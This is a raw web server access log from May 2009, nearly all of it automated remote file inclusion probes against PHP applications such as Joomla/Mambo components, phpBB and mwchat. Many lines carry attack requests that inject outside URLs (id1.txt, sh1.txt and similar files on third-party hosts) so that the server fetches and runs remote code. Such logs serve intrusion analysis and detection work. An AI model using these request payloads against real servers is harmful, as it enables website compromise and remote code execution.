85.214.83.196 - - [31/May/2009:15:40:03 -0400] "GET /log/sdaglobal.org-access_log.1/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 339
69.50.197.106 - - [31/May/2009:15:41:23 -0400] "GET /log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 313
69.50.197.106 - - [31/May/2009:15:41:23 -0400] "GET /log/sdaglobal.org-access_log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 340
69.50.197.106 - - [31/May/2009:15:41:23 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 309
69.50.197.106 - - [31/May/2009:15:41:26 -0400] "GET /log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 313
69.50.197.106 - - [31/May/2009:15:41:26 -0400] "GET /log/sdaglobal.org-access_log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 340
69.50.197.106 - - [31/May/2009:15:41:26 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 309
211.110.19.178 - - [31/May/2009:15:43:43 -0400] "GET /log/sdaglobal.org-access_log////?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 313
211.110.19.178 - - [31/May/2009:15:43:43 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 200 9432
211.110.19.178 - - [31/May/2009:15:43:43 -0400] "GET /log////?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 200 58364
74.208.111.178 - - [31/May/2009:15:44:01 -0400] "GET /log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 313
74.208.111.178 - - [31/May/2009:15:44:01 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 309
74.208.111.178 - - [31/May/2009:15:44:01 -0400] "GET /log/sdaglobal.org-access_log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 340
211.110.19.178 - - [31/May/2009:15:44:06 -0400] "GET /log/sdaglobal.org-access_log////?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 313
211.110.19.178 - - [31/May/2009:15:44:06 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 200 9432
211.110.19.178 - - [31/May/2009:15:44:06 -0400] "GET /log////?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 200 58364
69.50.197.106 - - [31/May/2009:15:45:51 -0400] "GET /log/sdaglobal.org-access_log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 338
211.110.19.178 - - [31/May/2009:15:45:52 -0400] "GET /log/sdaglobal.org-error_log////?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 312
69.50.197.106 - - [31/May/2009:15:45:53 -0400] "GET /log/sdaglobal.org-access_log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 338
211.110.19.178 - - [31/May/2009:15:46:00 -0400] "GET /log/sdaglobal.org-error_log////?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 312
116.36.213.166 - - [31/May/2009:15:46:33 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 332
116.36.213.166 - - [31/May/2009:15:46:33 -0400] "GET /log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 336
116.36.213.166 - - [31/May/2009:15:46:37 -0400] "GET /log/sdaglobal.org-error_log.1%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 364
116.36.213.166 - - [31/May/2009:15:46:45 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 332
116.36.213.166 - - [31/May/2009:15:46:46 -0400] "GET /log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 336
116.36.213.166 - - [31/May/2009:15:46:47 -0400] "GET /log/sdaglobal.org-access_log.1//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 363
203.22.204.193 - - [31/May/2009:15:46:55 -0400] "GET /log/sdaglobal.org-access_log.4/addons/guildbank/searcharrays.php?addonDir=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 345
203.22.204.193 - - [31/May/2009:15:46:55 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 314
203.22.204.193 - - [31/May/2009:15:46:55 -0400] "GET /log/addons/guildbank/searcharrays.php?addonDir=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 318
116.36.213.166 - - [31/May/2009:15:47:56 -0400] "GET /log/sdaglobal.org-error_log.1//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 362
116.36.213.166 - - [31/May/2009:15:48:13 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 365
211.110.19.178 - - [31/May/2009:15:48:44 -0400] "GET /log/sdaglobal.org-access_log.3%20////?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 316
211.110.19.178 - - [31/May/2009:15:48:53 -0400] "GET /log/sdaglobal.org-access_log.3%20////?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 316
203.22.204.193 - - [31/May/2009:15:49:34 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 314
116.36.213.166 - - [31/May/2009:15:50:35 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 332
116.36.213.166 - - [31/May/2009:15:50:37 -0400] "GET /log/sdaglobal.org-access_log.1//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 363
116.36.213.166 - - [31/May/2009:15:50:39 -0400] "GET /log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 336
74.208.111.178 - - [31/May/2009:15:51:12 -0400] "GET /log/sdaglobal.org-access_log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 338
116.36.213.166 - - [31/May/2009:15:52:05 -0400] "GET /log/sdaglobal.org-error_log.1//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 362
218.146.255.11 - - [31/May/2009:15:54:55 -0400] "GET /log//include/mail.inc.php?skin_board_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 306
218.146.255.11 - - [31/May/2009:15:54:55 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 302
218.146.255.11 - - [31/May/2009:15:54:55 -0400] "GET /log/sdaglobal.org-access_log//include/mail.inc.php?skin_board_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 331
65.55.209.4 - - [31/May/2009:15:57:31 -0400] "GET /log/?C=M;O=A HTTP/1.1" 200 58358
221.139.104.104 - - [31/May/2009:16:01:13 -0400] "GET /log/sdaglobal.org-access_log//include/bbs.lib.inc.php?site_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 334
221.139.104.104 - - [31/May/2009:16:01:13 -0400] "GET /log//include/bbs.lib.inc.php?site_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 309
74.52.2.130 - - [31/May/2009:16:15:21 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 317
74.52.2.130 - - [31/May/2009:16:15:21 -0400] "GET /log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 321
93.187.232.116 - - [31/May/2009:16:15:32 -0400] "GET /log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 321
93.187.232.116 - - [31/May/2009:16:15:32 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 317
121.165.73.157 - - [31/May/2009:16:16:19 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 317
121.165.73.157 - - [31/May/2009:16:16:19 -0400] "GET /log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 321
121.165.73.157 - - [31/May/2009:16:16:19 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 317
121.165.73.157 - - [31/May/2009:16:16:20 -0400] "GET /log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 321
121.165.73.157 - - [31/May/2009:16:16:23 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 317
121.165.73.157 - - [31/May/2009:16:16:23 -0400] "GET /log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 321
121.165.73.157 - - [31/May/2009:16:16:55 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 317
121.165.73.157 - - [31/May/2009:16:16:55 -0400] "GET /log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 321
192.168.1.55 - - [31/May/2009:16:17:46 -0400] "GET / HTTP/1.1" 304 -
192.168.1.55 - - [31/May/2009:16:17:48 -0400] "GET /images/gd.gif HTTP/1.1" 304 -
69.94.125.100 - - [31/May/2009:16:23:34 -0400] "GET /log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 358
69.94.125.100 - - [31/May/2009:16:23:34 -0400] "GET /log/sdaglobal.org-access_log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 383
69.94.125.100 - - [31/May/2009:16:23:34 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 354
69.94.125.100 - - [31/May/2009:16:23:35 -0400] "GET /log/sdaglobal.org-access_log.4/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 385
69.94.125.100 - - [31/May/2009:16:23:49 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 354
69.94.125.100 - - [31/May/2009:16:23:49 -0400] "GET /log/sdaglobal.org-access_log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 383
69.94.125.100 - - [31/May/2009:16:23:49 -0400] "GET /log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 358
69.94.125.100 - - [31/May/2009:16:23:49 -0400] "GET /log/sdaglobal.org-access_log.4/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 385
221.139.104.104 - - [31/May/2009:16:24:07 -0400] "GET /log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 333
221.139.104.104 - - [31/May/2009:16:24:07 -0400] "GET /log/sdaglobal.org-access_log.4//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 360
217.147.29.190 - - [31/May/2009:16:25:34 -0400] "GET /log/sdaglobal.org-access_log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 383
217.147.29.190 - - [31/May/2009:16:25:35 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 354
217.147.29.190 - - [31/May/2009:16:25:36 -0400] "GET /log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 358
217.147.29.190 - - [31/May/2009:16:25:42 -0400] "GET /log/sdaglobal.org-access_log.4/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 385
69.94.125.100 - - [31/May/2009:16:26:03 -0400] "GET /log/sdaglobal.org-access_log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 385
69.94.125.100 - - [31/May/2009:16:26:03 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 387
69.94.125.100 - - [31/May/2009:16:26:31 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 387
69.94.125.100 - - [31/May/2009:16:26:31 -0400] "GET /log/sdaglobal.org-access_log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 385
221.139.104.104 - - [31/May/2009:16:27:14 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 362
217.147.29.190 - - [31/May/2009:16:30:28 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 387
221.139.104.104 - - [31/May/2009:16:30:29 -0400] "GET /log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 358
221.139.104.104 - - [31/May/2009:16:30:29 -0400] "GET /log/sdaglobal.org-access_log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 383
221.139.104.104 - - [31/May/2009:16:30:29 -0400] "GET /log/sdaglobal.org-access_log.4/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 385
217.147.29.190 - - [31/May/2009:16:30:30 -0400] "GET /log/sdaglobal.org-access_log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 385
219.85.63.226 - - [31/May/2009:16:33:36 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://tstk.org//ktmllite/images/upload/sh1.txt???? HTTP/1.1" 404 317
219.85.63.226 - - [31/May/2009:16:33:36 -0400] "GET /log//phpsecurityadmin/include/logout.php?PSA_PATH=http://tstk.org//ktmllite/images/upload/sh1.txt???? HTTP/1.1" 404 321
221.139.104.104 - - [31/May/2009:16:34:48 -0400] "GET /log/sdaglobal.org-access_log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 385
69.50.197.106 - - [31/May/2009:16:35:01 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 320
69.50.197.106 - - [31/May/2009:16:35:01 -0400] "GET /log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 295
69.50.197.106 - - [31/May/2009:16:35:01 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 291
69.50.197.106 - - [31/May/2009:16:35:02 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 291
69.50.197.106 - - [31/May/2009:16:35:02 -0400] "GET /log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 295
69.50.197.106 - - [31/May/2009:16:35:02 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 320
221.139.104.104 - - [31/May/2009:16:36:34 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 387
24.39.162.98 - - [31/May/2009:16:37:01 -0400] "GET /log/sdaglobal.org-access_log.4/////////?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa511/ideal.txt???? HTTP/1.1" 404 320
24.39.162.98 - - [31/May/2009:16:37:02 -0400] "GET /////////?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa511/ideal.txt???? HTTP/1.1" 200 9432
69.50.197.106 - - [31/May/2009:16:37:59 -0400] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 322
213.175.197.156 - - [31/May/2009:16:38:08 -0400] "GET /log/sdaglobal.org-access_log.4/////////?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa511/ideal.txt???? HTTP/1.1" 404 320
213.175.197.156 - - [31/May/2009:16:38:09 -0400] "GET /////////?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa511/ideal.txt???? HTTP/1.1" 200 9432
69.50.197.106 - - [31/May/2009:16:38:39 -0400] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 322
213.229.60.50 - - [31/May/2009:16:39:33 -0400] "GET /log/sdaglobal.org-access_log.4/////////?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa511/ideal.txt???? HTTP/1.1" 404 320
213.229.60.50 - - [31/May/2009:16:39:33 -0400] "GET /////////?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa511/ideal.txt???? HTTP/1.1" 200 9432
213.229.60.50 - - [31/May/2009:16:39:34 -0400] "GET /log/////////?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa511/ideal.txt???? HTTP/1.1" 200 58369
213.229.60.50 - - [31/May/2009:16:40:41 -0400] "GET /log/sdaglobal.org-access_log.1/////////?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa511/ideal.txt???? HTTP/1.1" 404 320
194.63.250.46 - - [31/May/2009:16:43:42 -0400] "GET /log//doceboCms/class/class.dashboard_cms.php?where_framework=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 325
194.63.250.46 - - [31/May/2009:16:43:44 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 321
194.63.250.46 - - [31/May/2009:16:43:44 -0400] "GET /log/sdaglobal.org-access_log.4//doceboCms/class/class.dashboard_cms.php?where_framework=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 352
66.235.124.132 - - [31/May/2009:16:44:06 -0400] "GET /images/english.gif HTTP/1.1" 200 2582
66.235.124.132 - - [31/May/2009:16:44:06 -0400] "GET /images/chinese.gif HTTP/1.1" 200 3578
66.235.124.132 - - [31/May/2009:16:44:06 -0400] "GET /images/china.gif HTTP/1.1" 200 3479
213.246.62.35 - - [31/May/2009:16:45:12 -0400] "GET /log/sdaglobal.org-access_log.4//components/com_cpg/cpg.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 339
213.246.62.35 - - [31/May/2009:16:45:12 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 308
213.246.62.35 - - [31/May/2009:16:45:13 -0400] "GET /log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 312
213.175.197.156 - - [31/May/2009:16:45:43 -0400] "GET /////////?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa511/ideal.txt???? HTTP/1.1" 200 9432
194.63.250.46 - - [31/May/2009:16:46:05 -0400] "GET /log/sdaglobal.org-access_log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 357
194.63.250.46 - - [31/May/2009:16:46:07 -0400] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 328
194.63.250.46 - - [31/May/2009:16:46:12 -0400] "GET /log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 332
213.175.197.156 - - [31/May/2009:16:46:59 -0400] "GET /log/sdaglobal.org-access_log.3/////////?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa511/ideal.txt???? HTTP/1.1" 404 320
213.175.197.156 - - [31/May/2009:16:46:59 -0400] "GET /////////?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa511/ideal.txt???? HTTP/1.1" 200 9432
213.175.197.156 - - [31/May/2009:16:47:00 -0400] "GET /log/////////?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa511/ideal.txt???? HTTP/1.1" 200 58369
194.63.250.46 - - [31/May/2009:16:47:08 -0400] "GET //?mosConfig_absolute_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 200 9432
194.63.250.46 - - [31/May/2009:16:47:08 -0400] "GET /log/sdaglobal.org-access_log.4//?mosConfig_absolute_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 313
194.63.250.46 - - [31/May/2009:16:47:08 -0400] "GET /log//?mosConfig_absolute_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 200 58362
192.168.1.55 - - [31/May/2009:16:47:11 -0400] "GET / HTTP/1.1" 304 -
192.168.1.55 - - [31/May/2009:16:47:12 -0400] "GET /images/gd.gif HTTP/1.1" 304 -
194.63.250.46 - - [31/May/2009:16:47:37 -0400] "GET //?mosConfig_absolute_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 200 9432
194.63.250.46 - - [31/May/2009:16:47:37 -0400] "GET /log/sdaglobal.org-access_log.4//?mosConfig_absolute_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 313
194.63.250.46 - - [31/May/2009:16:47:37 -0400] "GET /log//?mosConfig_absolute_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 200 58362
66.249.72.107 - - [31/May/2009:16:48:07 -0400] "GET /log/china.sdaglobal.org-error_log HTTP/1.1" 200 1768
213.175.197.156 - - [31/May/2009:16:48:09 -0400] "GET /log/sdaglobal.org-access_log.1/////////?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa511/ideal.txt???? HTTP/1.1" 404 320
208.115.111.248 - - [31/May/2009:16:48:30 -0400] "GET /robots.txt HTTP/1.1" 404 287
194.63.250.46 - - [31/May/2009:16:49:10 -0400] "GET /log/sdaglobal.org-access_log.1//?mosConfig_absolute_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 313
194.63.250.46 - - [31/May/2009:16:49:15 -0400] "GET /log/sdaglobal.org-access_log.1//?mosConfig_absolute_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 313
194.63.250.46 - - [31/May/2009:16:51:42 -0400] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 328
194.63.250.46 - - [31/May/2009:16:51:42 -0400] "GET /log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 332
213.246.62.35 - - [31/May/2009:16:52:17 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 308
213.246.62.35 - - [31/May/2009:16:52:17 -0400] "GET /log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 312
213.246.62.35 - - [31/May/2009:16:52:17 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 341
213.246.62.35 - - [31/May/2009:16:52:29 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 341
213.246.62.35 - - [31/May/2009:16:53:22 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 308
213.246.62.35 - - [31/May/2009:16:53:22 -0400] "GET /log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 312
213.246.62.35 - - [31/May/2009:16:53:22 -0400] "GET /log/mark.hitechemall.com-access_log.2//components/com_cpg/cpg.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 346
194.63.250.46 - - [31/May/2009:16:54:59 -0400] "GET //includes/functions_portal.php?phpbb_root_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 311
194.63.250.46 - - [31/May/2009:16:55:02 -0400] "GET /log//includes/functions_portal.php?phpbb_root_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 315
194.63.250.46 - - [31/May/2009:16:55:07 -0400] "GET /log/sdaglobal.org-access_log.1//includes/functions_portal.php?phpbb_root_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 342
